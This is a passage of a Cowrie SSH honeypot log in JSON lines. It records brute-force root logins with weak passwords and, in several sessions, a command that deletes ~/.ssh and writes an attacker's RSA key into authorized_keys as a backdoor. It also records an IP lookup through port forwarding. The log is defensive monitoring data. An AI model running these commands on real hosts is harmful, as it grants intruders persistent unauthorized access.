{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T08:07:12.844056Z","src_ip":"212.227.235.229","session":"ab4db043e176"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T08:07:12.927511Z","src_ip":"212.227.235.229","session":"ab4db043e176"}
{"eventid":"cowrie.login.success","username":"root","password":"Qwert12","message":"login attempt [root/Qwert12] succeeded","sensor":"my-vps","timestamp":"2025-09-09T08:07:13.305281Z","src_ip":"212.227.235.229","session":"ab4db043e176"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:07:13.538713Z","src_ip":"212.227.235.229","session":"ab4db043e176"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T08:07:13.539428Z","src_ip":"212.227.235.229","session":"ab4db043e176"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T08:07:13.540517Z","src_ip":"212.227.235.229","session":"ab4db043e176"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:07:13.625509Z","src_ip":"212.227.235.229","session":"ab4db043e176"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:07:13.811142Z","src_ip":"212.227.235.229","session":"ab4db043e176"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T08:07:13.811833Z","src_ip":"212.227.235.229","session":"ab4db043e176"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T08:07:13.897782Z","src_ip":"212.227.235.229","session":"ab4db043e176"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:07:13.898731Z","src_ip":"212.227.235.229","session":"ab4db043e176"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39366,"dst_ip":"1.2.3.4","dst_port":22,"session":"03613c1d02f2","protocol":"ssh","message":"New connection: 212.227.235.229:39366 (1.2.3.4:22) [session: 03613c1d02f2]","sensor":"my-vps","timestamp":"2025-09-09T08:07:13.984290Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T08:07:13.984996Z","src_ip":"212.227.235.229","session":"03613c1d02f2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T08:07:14.085090Z","src_ip":"212.227.235.229","session":"03613c1d02f2"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T08:07:14.469809Z","src_ip":"212.227.235.229","session":"03613c1d02f2"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:07:15.558127Z","src_ip":"212.227.235.229","session":"03613c1d02f2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39378,"dst_ip":"1.2.3.4","dst_port":22,"session":"8bd98c2f58e9","protocol":"ssh","message":"New connection: 212.227.235.229:39378 (1.2.3.4:22) [session: 8bd98c2f58e9]","sensor":"my-vps","timestamp":"2025-09-09T08:07:15.642309Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T08:07:15.643210Z","src_ip":"212.227.235.229","session":"8bd98c2f58e9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T08:07:15.727781Z","src_ip":"212.227.235.229","session":"8bd98c2f58e9"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T08:07:16.109635Z","src_ip":"212.227.235.229","session":"8bd98c2f58e9"}
{"eventid":"cowrie.session.closed","duration":"3.4","message":"Connection lost after 3.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:07:16.195874Z","src_ip":"212.227.235.229","session":"ab4db043e176"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:07:16.196982Z","src_ip":"212.227.235.229","session":"8bd98c2f58e9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36308,"dst_ip":"1.2.3.4","dst_port":22,"session":"119678978a85","protocol":"ssh","message":"New connection: 212.227.125.160:36308 (1.2.3.4:22) [session: 119678978a85]","sensor":"my-vps","timestamp":"2025-09-09T08:08:10.229920Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-09-09T08:08:10.235695Z","src_ip":"212.227.125.160","session":"119678978a85"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-09-09T08:08:11.882626Z","src_ip":"212.227.125.160","session":"119678978a85"}
{"eventid":"cowrie.login.success","username":"root","password":"abcd1234","message":"login attempt [root/abcd1234] succeeded","sensor":"my-vps","timestamp":"2025-09-09T08:08:14.432063Z","src_ip":"212.227.125.160","session":"119678978a85"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"ip-who.com","dst_port":80,"src_ip":"212.227.125.160","src_port":0,"message":"direct-tcp connection request to ip-who.com:80 from :0","sensor":"my-vps","timestamp":"2025-09-09T08:08:14.911114Z","session":"119678978a85"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"ip-who.com","dst_port":80,"data":"b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to ip-who.com:80 with data b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-09-09T08:08:15.477097Z","src_ip":"212.227.125.160","session":"119678978a85"}
{"eventid":"cowrie.session.closed","duration":"5.6","message":"Connection lost after 5.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:08:15.787121Z","src_ip":"212.227.125.160","session":"119678978a85"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47382,"dst_ip":"1.2.3.4","dst_port":22,"session":"1539a4d2fe62","protocol":"ssh","message":"New connection: 212.227.235.229:47382 (1.2.3.4:22) [session: 1539a4d2fe62]","sensor":"my-vps","timestamp":"2025-09-09T08:08:22.369032Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T08:08:22.370113Z","src_ip":"212.227.235.229","session":"1539a4d2fe62"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T08:08:22.452127Z","src_ip":"212.227.235.229","session":"1539a4d2fe62"}
{"eventid":"cowrie.login.success","username":"root","password":"P@$$W0rd!!!","message":"login attempt [root/P@$$W0rd!!!] succeeded","sensor":"my-vps","timestamp":"2025-09-09T08:08:22.783863Z","src_ip":"212.227.235.229","session":"1539a4d2fe62"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:08:22.997331Z","src_ip":"212.227.235.229","session":"1539a4d2fe62"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T08:08:22.998008Z","src_ip":"212.227.235.229","session":"1539a4d2fe62"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T08:08:22.999108Z","src_ip":"212.227.235.229","session":"1539a4d2fe62"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:08:23.084353Z","src_ip":"212.227.235.229","session":"1539a4d2fe62"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:08:23.301098Z","src_ip":"212.227.235.229","session":"1539a4d2fe62"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T08:08:23.301902Z","src_ip":"212.227.235.229","session":"1539a4d2fe62"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T08:08:23.387184Z","src_ip":"212.227.235.229","session":"1539a4d2fe62"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:08:23.388080Z","src_ip":"212.227.235.229","session":"1539a4d2fe62"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47388,"dst_ip":"1.2.3.4","dst_port":22,"session":"599f54f4e525","protocol":"ssh","message":"New connection: 212.227.235.229:47388 (1.2.3.4:22) [session: 599f54f4e525]","sensor":"my-vps","timestamp":"2025-09-09T08:08:23.471842Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T08:08:23.472747Z","src_ip":"212.227.235.229","session":"599f54f4e525"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T08:08:23.557711Z","src_ip":"212.227.235.229","session":"599f54f4e525"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T08:08:23.939736Z","src_ip":"212.227.235.229","session":"599f54f4e525"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:08:25.026859Z","src_ip":"212.227.235.229","session":"599f54f4e525"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47398,"dst_ip":"1.2.3.4","dst_port":22,"session":"84a8d4d3510a","protocol":"ssh","message":"New connection: 212.227.235.229:47398 (1.2.3.4:22) [session: 84a8d4d3510a]","sensor":"my-vps","timestamp":"2025-09-09T08:08:25.109169Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T08:08:25.110086Z","src_ip":"212.227.235.229","session":"84a8d4d3510a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-g